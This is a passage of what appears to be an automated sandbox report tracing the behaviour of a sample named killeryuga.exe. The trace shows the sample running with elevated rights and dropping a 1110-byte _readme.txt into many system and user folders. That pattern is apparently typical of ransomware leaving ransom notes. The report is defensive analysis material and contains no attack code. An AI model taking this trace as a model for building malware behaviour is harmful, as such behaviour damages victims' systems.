Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\hu-HU\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\hu-HU\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\it-IT\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\it-IT\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\ja-JP\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\ja-JP\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\ko-KR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\ko-KR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\nb-NO\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\nb-NO\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\nl-NL\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\nl-NL\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\pl-PL\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\pl-PL\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\pt-BR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\pt-BR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\pt-PT\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\pt-PT\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\ru-RU\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\ru-RU\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\sv-SE\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\sv-SE\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\tr-TR\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\tr-TR\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\zh-CN\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\zh-CN\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\zh-HK\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\zh-HK\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\zh-TW\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Boot\zh-TW\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Config.Msi\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Config.Msi\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Documents and Settings\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Documents and Settings\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Adobe\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Adobe\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Documents\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Documents\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Favorites\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Favorites\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Microsoft Help\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Microsoft Help\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Mozilla\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Mozilla\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Oracle\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Oracle\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Start Menu\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Start Menu\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Sun\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Sun\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\ProgramData\Templates\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\ProgramData\Templates\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Recovery\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Recovery\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\System Volume Information\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Users\Default\_readme.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = C:\Users\Default\_readme.txt, size = 1110 True 1
Fn
Data
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
File Create filename = C:\Boot\BCD.LOG, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Process #6: killeryuga.exe
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:59, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x9d0
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x9D4
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
Threads
Thread 0x9d4
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringA, address_out = 0x76c33c5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesA, address_out = 0x76c5287b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatA, address_out = 0x76c5a959 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatA, address_out = 0x76c5a842 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeA, address_out = 0x76c58266 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFileEx, address_out = 0x76cb45ef True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x76cd71e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76c31245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetCommMask, address_out = 0x76cb7198 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TransmitCommChar, address_out = 0x76cb75fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = PrepareTape, address_out = 0x76cbd232 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumePathNameA, address_out = 0x76cbbeed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadWritePtr, address_out = 0x76c5d1ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextVolumeMountPointA, address_out = 0x76cbc189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnlockFileEx, address_out = 0x76c5d594 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryExA, address_out = 0x76ca9479 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedDecrement, address_out = 0x76c313f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteTapemark, address_out = 0x76cbd2d2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x76c3418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76c410b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalDeleteAtom, address_out = 0x76c4cdad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringA, address_out = 0x76c5bc39 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleOutputCP, address_out = 0x76c49b0f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleA, address_out = 0x76c312fc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x76c31462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleCount, address_out = 0x76c3cb29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x76c31400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x76c34a2d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x76c335b7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
